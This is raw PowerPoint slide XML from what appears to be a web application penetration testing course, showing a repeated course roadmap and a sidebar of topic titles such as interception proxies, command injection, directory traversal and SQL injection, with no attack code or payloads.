                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Exercise: Python Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Web App Vulnerabilities and Manual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>   Verification Techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Fiddler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> OWASP Zed Attack Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Burp Suite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Interception Exercise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Information Leakage &amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>    Directory Browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Directory Browsing Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Username Harvesting Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Command Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Directory Traversal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> SQL Injection Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Blind SQL Injection</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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
